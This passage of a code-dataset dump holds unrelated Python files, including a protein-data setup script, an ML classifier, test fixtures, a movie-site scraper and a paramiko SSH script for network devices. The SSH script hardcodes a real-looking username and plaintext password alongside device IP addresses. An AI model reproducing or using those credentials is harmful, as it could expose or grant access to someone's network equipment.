"call"}]} +{"seq_id": "283054986", "text": "from setuptools import setup\n\nmmtfPyspark_packages = ['mmtfPyspark',\n                        'mmtfPyspark.datasets',\n                        'mmtfPyspark.filters',\n                        'mmtfPyspark.io',\n                        'mmtfPyspark.mappers',\n                        'mmtfPyspark.ml',\n                        'mmtfPyspark.utils',\n                        'mmtfPyspark.webfilters',\n                        'mmtfPyspark.webservices',\n                        'mmtfPyspark.interactions'\n                        ]\n\nmmtfPyspark_dependencies = ['msgpack>=0.5.6',\n                            'numpy>=1.15.4',\n                            'ipywidgets>=7.4.2',\n                            'mmtf-python>=1.1.2',\n                            'requests>=2.20.0',\n                            'matplotlib>=2.2.3',\n                            'numba>=0.41.0',\n                            'seaborn>=0.8.1',\n                            'sympy>=1.1.1',\n                            'py3Dmol>=0.8.0',\n                            'scipy>=1.1.0',\n                            'scikit-learn>=0.20.0',\n                            'pandas>=0.23.4',\n                            'py4j>=0.10.7',\n                            'pyarrow>=0.11.1',\n                            'xlrd>=1.1.0',\n                            'nose',\n                            'cython',\n                            ]\n\nLONG_DESCRIPTION = \"\"\"\n**mmtfPyspark** is a Python package that provides APIs and sample applications for distributed analysis and scalable mining of 3D biomacromolecular structures, such as the Protein Data Bank (PDB) archive. 
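A quick toy run of the AveragedPerceptron class from the perceptron.py entry above; the feature names ('excl', 'plain') and POS/NEG labels are invented purely for illustration:

```python
# Toy usage of the AveragedPerceptron defined above; data is fabricated.
ap = AveragedPerceptron()
ap.labels = {'POS', 'NEG'}

for _ in range(5):
    # predict, then update with the true label (update is a no-op when correct)
    ap.update('POS', ap.predict({'excl': 1.0}), {'excl': 1.0})
    ap.update('NEG', ap.predict({'plain': 1.0}), {'plain': 1.0})

ap.average_weights()
print(ap.predict({'plain': 1.0}))  # -> 'NEG' once the averaged weights settle
```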
mmtfPyspark uses Big Data technologies to enable high-performance parallel processing of macromolecular structures.\n\"\"\"\n\nsetup(name='mmtfPyspark',\n      version='0.3.0',\n      description='Methods for parallel and distributed analysis and mining of the Protein Data Bank using MMTF and Apache Spark',\n      long_description=LONG_DESCRIPTION,\n      url='https://github.com/sbl-sdsc/mmtf-pyspark',\n      author='Peter Rose',\n      author_email='pwrose.ucsd@gmail.com',\n      license='Apache License 2.0',\n      keywords='mmtf spark pyspark protein PDB',\n      packages=mmtfPyspark_packages,\n      install_requires=mmtfPyspark_dependencies,\n      python_requires='>=3.8',\n      include_package_data=True,\n      test_suite='nose.collector',\n      tests_require=['nose'],\n      classifiers=['Development Status :: 3 - Alpha',\n                   'Intended Audience :: Science/Research',\n                   'Topic :: Scientific/Engineering :: Bio-Informatics',\n                   'License :: OSI Approved :: Apache Software License',\n                   'Programming Language :: Python :: 3.6'],\n      zip_safe=False)\n", "sub_path": "setup-dev.py", "file_name": "setup-dev.py", "file_ext": "py", "file_size_in_byte": 2697, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "setuptools.setup", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "276996718", "text": "# classification\n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nimport warnings\nfrom pandas.plotting import scatter_matrix\nwarnings.simplefilter('ignore')\nsns.set()\n\n#loading dataset\nfrom sklearn.datasets import load_iris\ndataset=load_iris()\n\n\n# Importing the dataset\ndataset = pd.read_csv('parkinsonsdata.csv')\n#finding outliers\nfrom scipy import stats\nz=np.abs(stats.zscore(dataset.iloc[:,1:]))\nprint(z)\nthreshold=3\nprint(np.where(z>3))\nprint(z[73][1])\n\nq1=dataset.quantile(0.25)\nq3=dataset.quantile(0.75)\nIQR=q3-q1\nprint(IQR)\n\nprint((dataset<(q1-1.5*IQR))|(dataset>(q3+1.5*IQR)))\ndataset=dataset[(z<3).all(axis=1)]\ndataset.shape\ndataset.size\n\nX=dataset.iloc[:,[1,2,3,10,14,16]].values\ny=dataset.iloc[:,-1].values\n\nfeatures=dataset.loc[:,dataset.columns!='status'].values[:,1:]\ntarget=dataset.loc[:,'status'].values\n\nprint(dataset.columns)\nprint(dataset.shape)\nprint(dataset.head(7))\nprint(dataset.tail(7))\nprint(dataset.describe())\nprint(X.shape)\nprint(y[y==1].shape[0],y[y==0].shape[0])\ndataset.corr(method='pearson')\n\n\n'''from sklearn.feature_selection import SelectKBest\nfrom sklearn.feature_selection import chi2\nbestfeatures = SelectKBest(score_func=chi2, k=12)\nfit = bestfeatures.fit(X,y)\ndfscores = pd.DataFrame(fit.scores_)\ndfcolumns = pd.DataFrame(X.columns)\n#concat two dataframes for better visualization \nfeatureScores = pd.concat([dfcolumns,dfscores],axis=1)\nfeatureScores.columns = ['features','Score'] #naming the dataframe columns\nprint(featureScores.nlargest(12,'Score')) #print 10 best features\n\nfrom sklearn.ensemble import ExtraTreesClassifier\nimport matplotlib.pyplot as plt\nmodel = ExtraTreesClassifier()\nmodel.fit(X,y)\nprint(model.feature_importances_) #use inbuilt class feature_importances of tree based classifiers\n#plot graph of feature importances for better visualization\nfeat_importances = pd.Series(model.feature_importances_, index=X.columns)\nfeat_importances.nlargest(12).plot(kind='barh')\nplt.show()'''\n\nsns.heatmap(X)\n\n\n\n'''# class distribution\nprint(dataset.groupby('class').size())\n# box and whisker plots\ndataset.plot(kind='box', subplots=True, 
layout=(2,2), sharex=False, sharey=False)\nplt.show()\n# histograms\ndataset.hist()\nplt.show()\n# scatter plot matrix\nscatter_matrix(dataset)\nplt.show()'''\n\n\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\n\n# Feature Scaling\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import MinMaxScaler\nsc = StandardScaler()\nsc = MinMaxScaler((-1,1))\nX=sc.fit_transform(X_train,X_test)\nX_train = sc.fit_transform(X_train)\nX_test = sc.transform(X_test)\n\nfrom sklearn import model_selection\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import RandomForestClassifier\n\n\n# Spot Check Algorithms\nmodels = []\nmodels.append(('LR', LogisticRegression(solver='liblinear', multi_class='ovr')))\nmodels.append(('LDA', LinearDiscriminantAnalysis(n_components=2)))\nmodels.append(('KNN', KNeighborsClassifier(n_neighbors = 5, metric = 'minkowski', p = 2)))\nmodels.append(('CART', DecisionTreeClassifier(criterion = 'gini', splitter='best',min_samples_split=2)))\nmodels.append(('NB', GaussianNB(var_smoothing=1e-9)))\n#models.append(('SVM', SVC(kernel = 'linear', random_state = 0)))\n#models.append(('SVM', SVC(kernel = 'poly', degree=3, gamma=2, coef0=1)))\n#models.append(('Random',RandomForestClassifier(n_estimators = 10, criterion = 'entropy', random_state = 5,bootstrap=True,max_depth=70)))\nmodels.append(('Random',RandomForestClassifier(n_estimators = 10,random_state = 0)))\nmodels.append(('SVM', SVC(kernel='rbf',gamma=0.71,random_state = 0,C=1)))\n# evaluate each model in turn\nresults = []\nnames = []\nfor name, model in models:\n\tkfold = model_selection.KFold(n_splits=10, random_state=0)\n\tcv_results = model_selection.cross_val_score(model, X_train, y_train, cv=kfold, scoring='accuracy')\n\tresults.append(cv_results)\n\tnames.append(name)\n\tmsg = \"%s: %f (%f)\" % (name, cv_results.mean(), cv_results.std())\n\tprint(msg)\n\n\n# graph Comparison Algorithms \nfig = plt.figure()\nfig.suptitle('Algorithm Comparison')\nax = fig.add_subplot(111)\nplt.boxplot(results)\nax.set_xticklabels(names)\nplt.show()\n\n\n\n# Make predictions on validation dataset\nlda = SVC()\nlda.fit(X_train, y_train)\ny_pred = lda.predict(X_test)\n#y_pred = lda.score(X_test,y_test)\naccuracy=accuracy_score(y_test, y_pred)\nprint('accuracy:',accuracy)\ncm = confusion_matrix(y_test, y_pred)\nprint('cm:','\\n', cm)\ncr=classification_report(y_test, y_pred)\nprint('report:','\\n',cr)\n\n\nPcorrect=(y_test == y_pred).sum()\nPwrong=(y_test != y_pred).sum()\nAccuracy=Pcorrect/39\nError=Pwrong/39 \n\n'''from sklearn.model_selection import GridSearchCV\nparameters={'n_estimators': [10], \n 'max_features':[3], \n 'random_state' : [5],\n 'bootstrap':[True]}\n\ngrid_search=GridSearchCV(estimator=lda,\n param_grid=parameters,\n cv=10,n_jobs=-1,verbose=2,\n scoring = 'accuracy',\n refit=True)\ngrid_search.fit(X_train, y_train)\nbest_accuracy = grid_search.best_score_\nbest_parameters = 
grid_search.best_params_'''\n\n\ncor=dataset.corr()\nfig=plt.figure()\nax=fig.add_subplot(111)\ncax=ax.matshow(cor,vmin=-1,vmax=1)\nfig.colorbar(cax)\n", "sub_path": "parkinson.py", "file_name": "parkinson.py", "file_ext": "py", "file_size_in_byte": 5814, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "warnings.simplefilter", "line_number": 9, "usage_type": "call"}, {"api_name": "seaborn.set", "line_number": 10, "usage_type": "call"}, {"api_name": "sklearn.datasets.load_iris", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 21, "usage_type": "call"}, {"api_name": "scipy.stats.zscore", "line_number": 21, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 21, "usage_type": "name"}, {"api_name": "numpy.where", "line_number": 24, "usage_type": "call"}, {"api_name": "seaborn.heatmap", "line_number": 74, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 93, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 98, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 99, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 119, "usage_type": "call"}, {"api_name": "sklearn.discriminant_analysis.LinearDiscriminantAnalysis", "line_number": 120, "usage_type": "call"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 121, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 122, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes.GaussianNB", "line_number": 123, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 127, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 128, "usage_type": "call"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 133, "usage_type": "call"}, {"api_name": "sklearn.model_selection", "line_number": 133, "usage_type": "name"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 134, "usage_type": "call"}, {"api_name": "sklearn.model_selection", "line_number": 134, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 142, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.boxplot", "line_number": 145, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 145, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 147, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 147, "usage_type": "name"}, {"api_name": "sklearn.svm.SVC", "line_number": 152, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 156, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 158, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 160, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 186, "usage_type": "name"}]} +{"seq_id": "336702203", "text": "\"\"\"\nFixtures for reduce_luns_from_storage_domain module\n\"\"\"\nimport pytest\nimport config\nfrom art.unittest_lib.common import testflow\nfrom 
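The parkinson.py entry above screens outliers with both a z-score cutoff and 1.5*IQR fences; here is a self-contained illustration of those two rules on made-up numbers (the data values are fabricated so each rule visibly drops the outlier):

```python
# Stand-alone demo of the two outlier rules used in the script above.
import numpy as np
import pandas as pd
from scipy import stats

df = pd.DataFrame({'x': [1.0] * 10 + [50.0]})

# Rule 1: keep rows whose z-score is below 3 in every column.
z = np.abs(stats.zscore(df))
print(df[(z < 3).all(axis=1)])          # the 50.0 row is removed

# Rule 2: keep rows inside the 1.5 * IQR fences around the quartiles.
q1, q3 = df['x'].quantile(0.25), df['x'].quantile(0.75)
iqr = q3 - q1
print(df[(df['x'] >= q1 - 1.5 * iqr) & (df['x'] <= q3 + 1.5 * iqr)])
```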
art.rhevm_api.tests_lib.low_level import (\n storagedomains as ll_sd,\n disks as ll_disks,\n vms as ll_vms\n)\nfrom rhevmtests.fixtures import (\n create_lun_on_storage_server, remove_lun_from_storage_server\n)\n\n\n@pytest.fixture(scope='class')\ndef set_disk_params(request, storage):\n \"\"\"\n Set disk size\n \"\"\"\n self = request.node.cls\n size_diff = getattr(self, 'size_diff', 5)\n self.disk_size = ll_sd.get_free_space(\n self.new_storage_domain\n ) - size_diff * config.GB\n assert self.disk_size, \"Failed to get storage domain %s size\" % (\n self.new_storage_domain\n )\n self.add_disk_params = {'sparse': False, 'format': config.RAW_DISK}\n\n\n@pytest.fixture(scope='class')\ndef init_domain_disk_param(request, storage):\n \"\"\"\n Initialize VM parameters\n \"\"\"\n self = request.node.cls\n\n # In some cases we would like the disk to be created on an existing SD (for\n # example, in disk migration tests)\n if hasattr(self, 'existing_domain'):\n existing_domains = ll_sd.getStorageDomainNamesForType(\n config.DATA_CENTER_NAME, self.storage\n )\n self.storage_domain = existing_domains[0] if existing_domains[0] != (\n self.new_storage_domain\n ) else existing_domains[1]\n else:\n self.storage_domain = self.new_storage_domain\n\n\n@pytest.fixture(scope='class')\ndef attach_disk_to_second_vm(request, storage):\n \"\"\"\n Attach shared disk to second VM\n \"\"\"\n self = request.node.cls\n\n attach_kwargs = config.attach_disk_params.copy()\n testflow.setup(\n \"Attaching shared disk %s to VM %s\", self.disk_name, self.vm_name_2\n )\n assert ll_disks.attachDisk(\n True, alias=self.disk_name, vm_name=self.vm_name_2, **attach_kwargs\n ), (\"Failed to attach disk %s to VM %s\" % (self.disk_name, self.vm_name_2))\n ll_disks.wait_for_disks_status([self.disk_name])\n\n\n@pytest.fixture(scope='class')\ndef set_shared_disk_params(request, storage):\n \"\"\"\n Set shared disk params\n \"\"\"\n self = request.node.cls\n\n self.storage_domain = self.new_storage_domain\n\n # shared disk cannot be sparse\n self.add_disk_params = {\n 'shareable': True, 'sparse': False, 'format': config.RAW_DISK\n }\n\n\n@pytest.fixture(scope='class')\ndef poweroff_vms(request, storage):\n \"\"\"\n Power off VMs\n \"\"\"\n self = request.node.cls\n\n def finalizer():\n testflow.teardown(\"Power off VMs %s\", [self.vm_name, self.vm_name_2])\n assert ll_vms.stop_vms_safely([self.vm_name, self.vm_name_2]), (\n \"Failed to power off VMs %s\" % [self.vm_name, self.vm_name_2]\n )\n request.addfinalizer(finalizer)\n\n\n@pytest.fixture(scope='class')\ndef create_second_lun(request, storage):\n \"\"\"\n Create second LUN on storage server\n \"\"\"\n create_lun_on_storage_server(request, storage)\n append_to_luns_to_resize(request, storage)\n\n\n@pytest.fixture(scope='class')\ndef remove_second_lun(request, storage):\n \"\"\"\n Remove second LUN from storage server\n \"\"\"\n remove_lun_from_storage_server(request, storage)\n\n\n@pytest.fixture(scope='class')\ndef append_to_luns_to_resize(request, storage):\n \"\"\"\n Initialize LUNs to extend list\n \"\"\"\n self = request.node.cls\n\n def finalizer():\n del config.LUNS_TO_RESIZE[:]\n del config.LUNS_IDENTIFIERS[:]\n request.addfinalizer(finalizer)\n config.LUNS_TO_RESIZE.append(self.new_lun_id)\n config.LUNS_IDENTIFIERS.append(self.new_lun_identifier)\n", "sub_path": "art/tests/rhevmtests/storage/storage_resize_storage_domain/fixtures.py", "file_name": "fixtures.py", "file_ext": "py", "file_size_in_byte": 3610, "program_lang": "python", "lang": "en", "doc_type": "code", 
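A hypothetical consumer of the class-scoped fixtures defined in the fixtures.py entry above; pytest resolves them per class and each fixture reads or writes attributes on request.node.cls. All names below are invented, and a `storage` fixture is assumed to exist elsewhere in the suite, as the signatures imply:

```python
# Hypothetical test class wired to the fixtures above; names are stand-ins.
import pytest

@pytest.mark.usefixtures('set_disk_params', 'poweroff_vms')
class TestResizeExample(object):
    new_storage_domain = 'sd_example'   # invented storage domain name
    size_diff = 10                      # overrides the fixture's default of 5
    vm_name = 'vm_example_1'            # consumed by the poweroff_vms finalizer
    vm_name_2 = 'vm_example_2'

    def test_disk_size_computed(self):
        # set_disk_params stored the computed size on the class
        assert self.disk_size > 0
```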
"dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "art.rhevm_api.tests_lib.low_level.storagedomains.get_free_space", "line_number": 24, "usage_type": "call"}, {"api_name": "art.rhevm_api.tests_lib.low_level.storagedomains", "line_number": 24, "usage_type": "name"}, {"api_name": "config.GB", "line_number": 26, "usage_type": "attribute"}, {"api_name": "config.RAW_DISK", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 17, "usage_type": "call"}, {"api_name": "art.rhevm_api.tests_lib.low_level.storagedomains.getStorageDomainNamesForType", "line_number": 43, "usage_type": "call"}, {"api_name": "art.rhevm_api.tests_lib.low_level.storagedomains", "line_number": 43, "usage_type": "name"}, {"api_name": "config.DATA_CENTER_NAME", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 33, "usage_type": "call"}, {"api_name": "config.attach_disk_params.copy", "line_number": 60, "usage_type": "call"}, {"api_name": "config.attach_disk_params", "line_number": 60, "usage_type": "attribute"}, {"api_name": "art.unittest_lib.common.testflow.setup", "line_number": 61, "usage_type": "call"}, {"api_name": "art.unittest_lib.common.testflow", "line_number": 61, "usage_type": "name"}, {"api_name": "art.rhevm_api.tests_lib.low_level.disks.attachDisk", "line_number": 64, "usage_type": "call"}, {"api_name": "art.rhevm_api.tests_lib.low_level.disks", "line_number": 64, "usage_type": "name"}, {"api_name": "art.rhevm_api.tests_lib.low_level.disks.wait_for_disks_status", "line_number": 67, "usage_type": "call"}, {"api_name": "art.rhevm_api.tests_lib.low_level.disks", "line_number": 67, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 53, "usage_type": "call"}, {"api_name": "config.RAW_DISK", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 70, "usage_type": "call"}, {"api_name": "art.unittest_lib.common.testflow.teardown", "line_number": 93, "usage_type": "call"}, {"api_name": "art.unittest_lib.common.testflow", "line_number": 93, "usage_type": "name"}, {"api_name": "art.rhevm_api.tests_lib.low_level.vms.stop_vms_safely", "line_number": 94, "usage_type": "call"}, {"api_name": "art.rhevm_api.tests_lib.low_level.vms", "line_number": 94, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 85, "usage_type": "call"}, {"api_name": "rhevmtests.fixtures.create_lun_on_storage_server", "line_number": 105, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 100, "usage_type": "call"}, {"api_name": "rhevmtests.fixtures.remove_lun_from_storage_server", "line_number": 114, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 109, "usage_type": "call"}, {"api_name": "config.LUNS_TO_RESIZE", "line_number": 125, "usage_type": "attribute"}, {"api_name": "config.LUNS_IDENTIFIERS", "line_number": 126, "usage_type": "attribute"}, {"api_name": "config.LUNS_TO_RESIZE.append", "line_number": 128, "usage_type": "call"}, {"api_name": "config.LUNS_TO_RESIZE", "line_number": 128, "usage_type": "attribute"}, {"api_name": "config.LUNS_IDENTIFIERS.append", "line_number": 129, "usage_type": "call"}, {"api_name": "config.LUNS_IDENTIFIERS", "line_number": 129, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 117, "usage_type": "call"}]} +{"seq_id": "315715026", "text": "import requests\nimport re\nimport time\nfrom config import *\nfrom pprint import pprint\n\nheaders = {\n 'Accept': 
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n    'Accept-Encoding': 'gzip, deflate',\n    'Accept-Language': 'zh-CN,zh;q=0.9',\n    'Cache-Control': 'max-age=0',\n    'Connection': 'keep-alive',\n    'Host': 'dianying.2345.com',\n    'Upgrade-Insecure-Requests': '1',\n    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36',\n}\n\n\n\ns = requests.session()\nurl_detail_page = []\n# http://dianying.2345.com/list/donghua-riben------2.html\nfor i in range(1,5):\n    res = s.get('http://dianying.2345.com/list/donghua-riben------{}.html'.format(str(i)),headers=headers)\n    print(res.status_code)\n    url_detail_page += re.findall(r'target=\"_blank\" href=\"(.*?)\"',res.text)\n    time.sleep(1)\n\nvideo_info = []\nhaibaos = []\nfor url in url_detail_page:\n    res = s.get('http:'+url,headers=headers)\n    # http://www.36605558.com/index.php?\n    videoname = re.findall(r'《(.*?)》',res.text)[0]# film title\n    haibao = 'http:'+ re.findall(r'onerror=\"javascript:this.src=\\'(.*?)>',res.text)[0].split('src=\"')[1].replace('\\\"','') # poster image\n    director = re.findall(r'ys_dy_2015_detail_daoy\" title=\"(.*?)\"',res.text)[0] if re.findall(r'ys_dy_2015_detail_daoy\" title=\"(.*?)\"',res.text)!=[] else 'NULL' # director\n    videotime = re.findall(r'<em>(.*?)分钟</em>',res.text)[0] if re.findall(r'<em>(.*?)分钟</em>',res.text)!=[] else 'NULL' # running time in minutes\n    area = re.findall(r'<a title=\"(.*?)\" data-ajax83=\"ys_dy_2015_detail_diq\"',res.text)[0] if re.findall(r'<a title=\"(.*?)\" data-ajax83=\"ys_dy_2015_detail_diq\"',res.text)!=[] else 'NULL' # region\n    score = re.findall(r'<em class=\"emScore\">(.*?)</em>',res.text)[0] if re.findall(r'<em class=\"emScore\">(.*?)</em>',res.text)!=[] else 'NULL' # rating\n    description = re.findall(r'<span class=\"sAll\">(.*?)</span>',res.text)[0] if re.findall(r'<span class=\"sAll\">(.*?)</span>',res.text)!=[] else 'NULL' # synopsis\n    videourl ='http://www.36605558.com/index.php?url='+re.findall(r'<a href=\"(.*?)\" target=\"_blank\" class=\"v_blue_btn latestBtn\"',res.text)[0] if re.findall(r'<a href=\"(.*?)\" target=\"_blank\" class=\"v_blue_btn latestBtn\"',res.text)!=[] else 'NULL' # playback URL (the first one listed)\n    time.sleep(0.5)\n    video_info.append((videoname,director,videotime,area,score,description,videourl))\n    pprint((videoname,director,videotime,area,score,description,videourl))\n    haibaos.append(haibao)\n\ncur.executemany('INSERT INTO donghuapian_donghuadianying(video_name,video_director,video_time,video_area,video_score,video_description,video_url) VALUES (%s,%s,%s,%s,%s,%s,%s)',video_info[:-1])\ncon.commit()\n# for detail,haibao in zip(video_info,haibaos):\n#     with open('./images/'+detail[0].replace('\\\\','')+'.jpg','wb') as f:\n#         f.write(s.get(haibao).content)\n\nimport os\nimages = os.listdir('dongmantiandi/dongmantiandi/media')\nfor img in images:\n    sql = 'UPDATE donghuapian_donghuadianying set video_image=\"images/'+img+'\" where video_name=\"'+img.split('.')[0]+'\"'\n    cur.execute(sql)\n    con.commit()", "sub_path": "spiders/dongmandianying_spider.py", "file_name": "dongmandianying_spider.py", "file_ext": "py", "file_size_in_byte": 3187, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "requests.session", "line_number": 20, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 26, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 27, "usage_type": "call"}, {"api_name": 
"re.findall", "line_number": 35, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 36, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 37, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 38, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 39, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 40, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 41, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 42, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 44, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "443430269", "text": "# -*- coding=utf-8 -*-\n\nimport paramiko\nimport datetime\nimport time\nimport re\n\n\n# 支持读取多页回显(仅华为可用,思科暂不明确),已解决空行问题,就和CRT显示的一样~\ndef ssh_cmd(ip, username, password, cmd_list, verbose=True):\n ssh = paramiko.SSHClient() # 创建SSH Client\n ssh.load_system_host_keys() # 加载系统SSH密钥\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # 添加新的SSH密钥\n ssh.connect(ip, port=22, username=username, password=password, timeout=5, compress=True) # SSH连接\n\n chan = ssh.invoke_shell() # 激活交互式shell\n time.sleep(2)\n # x = chan.recv(2048).decode() # 接收回显信息\n resul = ''\n space = ' ' # 要发送的空格\n\n for cmd in cmd_list: # 逐个读取命令\n print(ip, cmd)\n chan.send(cmd.encode()) # 执行命令,注意字串都需要编码为二进制字串\n chan.send(b'\\n') # 一定要注意输入回车\n time.sleep(2) # 由于有些回显可能过长,所以可以考虑等待更长一些时间\n x = chan.recv(40960).decode() # 读取回显,有些回显可能过长,请把接收缓存调大\n\n # o = re.sub('\\s+----\\sMore\\s----', '', x)\n o = re.sub('\\r\\n', '\\n', re.sub('\\s+----\\sMore\\s----', '', x), re.S | re.M)\n resul += re.sub('\\r\\n', '\\n', o, re.S | re.M)\n\n # 一直空格 直到回显完\n while 1:\n # 如果 本次回显为 <sysname> 就退出循环 否则 继续发送空格 读取命令剩余的回显\n if re.match('.*<.+>', x.strip()): # strip 很重要!!!\n # print('1')\n\n break\n else:\n # print('2')\n chan.send(space.encode())\n chan.send(b'\\n')\n time.sleep(2) # 防止有的设备反应慢,还是多等一会儿吧\n x = chan.recv(40960).decode()\n # abc = re.sub('\\s+----\\sMore\\s----', '', x)\n o = re.sub('\\x1b\\[\\d{2}D[\\s]+\\x1b\\[\\d{2}D', '\\r\\n', re.sub('\\s+----\\sMore\\s----', '', x))\n # \\x1b[42D \\x1b[42D\n resul += re.sub('\\r\\n', '\\n', o, re.S | re.M)\n # 空格后回显会有上面这类字符,需要干掉\n\n sysname = re.match('.*<(.+)>', x.strip()).groups()[0]\n\n chan.close() # 退出交互式shell\n ssh.close() # 退出ssh会话\n # print([resul])\n return resul, sysname\n\n\ndef resule_to_txt(ipadd, cmd):\n res, sysname = ssh_cmd(ipadd, 'wujiajie', '1ffw#1*dF', cmd) # ssh登录的 用户名 密码在此\n ti = datetime.datetime.now().strftime('%Y.%m.%d %H.%M.%S')\n with open('{} -- {}.txt'.format(sysname, ipadd), 'w') as f:\n f.write(res)\n print('{} -- {} -- {}'.format(sysname, ipadd, ti) + ' 已完成!')\n\n\nif __name__ == '__main__':\n # print(ssh_cmd('192.168.0.97', 'wujiajie', '1ffw#1*dF', 'dis cu'))\n lis = ['111.1.48.28',\n '111.1.48.126',\n ]\n\n cm = ['dis acl all',\n 'dis policy all',\n ]\n\n # try:\n for i in lis:\n resule_to_txt(i, cm) # 设备地址 命令\n\n # except Exception as ex:\n # print(ex)\n\n", "sub_path": "ssh_sth.py", "file_name": "ssh_sth.py", "file_ext": "py", "file_size_in_byte": 3211, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "paramiko.SSHClient", "line_number": 11, "usage_type": "call"}, {"api_name": "paramiko.AutoAddPolicy", "line_number": 13, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 17, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 26, "usage_type": "call"}, 
{"api_name": "re.sub", "line_number": 30, "usage_type": "call"}, {"api_name": "re.S", "line_number": 30, "usage_type": "attribute"}, {"api_name": "re.M", "line_number": 30, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 31, "usage_type": "call"}, {"api_name": "re.S", "line_number": 31, "usage_type": "attribute"}, {"api_name": "re.M", "line_number": 31, "usage_type": "attribute"}, {"api_name": "re.match", "line_number": 36, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 44, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 47, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 49, "usage_type": "call"}, {"api_name": "re.S", "line_number": 49, "usage_type": "attribute"}, {"api_name": "re.M", "line_number": 49, "usage_type": "attribute"}, {"api_name": "re.match", "line_number": 52, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 62, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 62, "usage_type": "attribute"}]} +{"seq_id": "225881116", "text": "# -*- encoding: utf-8 -*-\n# Copyright 2016 Vinzor Co.,Ltd.\n#\n# comment\n#\n# 4/19/16 bitson : Init\n\nimport os\nimport sys\nimport re\n\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..', '..')))\n\n\nimport threading\nimport time\nimport logging\n\nfrom phoenix.cloud.openstack.client import ClientManager\nfrom phoenix.common.proxy import SimpleProxy\nfrom phoenix.common.singleton import SingletonMixin\n\nfrom phoenix import db\nfrom phoenix.db.models import FloatingIp\n\nLOG = logging.getLogger(__name__)\n\n# check if neutron is supported\nNEUTRON_CLI = None\nKEYSTONE_CLI = SimpleProxy(lambda: 